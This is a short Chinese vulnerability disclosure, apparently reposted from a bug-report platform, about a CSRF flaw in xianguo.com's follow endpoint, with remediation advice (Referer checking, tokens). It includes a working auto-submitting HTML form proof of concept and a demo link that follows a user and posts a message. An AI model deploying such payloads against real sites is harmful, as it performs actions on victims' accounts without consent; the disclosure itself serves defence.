鲜果网某处CSRF漏洞可蔓延蠕虫

安全 漏洞
鲜果网某处CSRF漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布文字、加关注等等!

鲜果网某处CSRF漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布文字、加关注等等!

详细说明:在接受POST和GET的信息的时候,未对POST来路(Referer)进行验证,同时也没有在POST的信息中加token验证信息的正确性,导致漏洞产生。

演示地址:http://in.imlonghao.com/WooYun-XXXXX/ (用户名/密码:imlonghao)

登录状态下访问,会自动发一条名为Hello World的微博,并会关注一个用户。

漏洞地址:http://xianguo.com/beings/follow

<html>

<body>

<form id="imlonghao" name="imlonghao" action="http://xianguo.com/beings/follow" method="post">

<input type="text" name="beingsIds" value="1378148" />

<input type="text" name="parentId" value="0" />

<input type="text" name="ftype" value="0" />

</form>

<script>

document.imlonghao.submit();

</script>

</body>

</html>

接口返回信息

鲜果网某处CSRF漏洞可蔓延蠕虫

效果

[[97443]]

【发文字】

修复方案:

检查POST来路Referer

在POST的信息中加token

责任编辑:蓝雨泪 来源: 2cto
相关推荐

2011-08-31 14:38:40

2013-04-24 15:56:40

2015-02-10 13:24:27

CSRF漏洞CSRF

2013-12-02 13:34:55

2010-07-20 10:26:50

2014-07-17 15:47:52

2014-12-30 14:02:54

2011-05-10 09:55:14

2014-08-01 09:12:39

2009-11-09 19:59:47

2019-09-17 10:06:46

数据库程序员网络安全

2017-09-22 12:31:08

云计算容器容器蔓延

2021-12-23 09:47:36

Log4jRCE漏洞DoS漏洞

2014-06-12 13:44:19

2010-07-28 16:02:51

2015-03-06 17:02:51

2021-12-23 16:35:54

Apache Log4

2020-07-16 11:51:37

漏洞WindowsDNS服务器

2015-03-10 18:07:53

2014-07-25 10:20:39

ChromecastRickMote Co黑客
点赞
收藏

51CTO技术栈公众号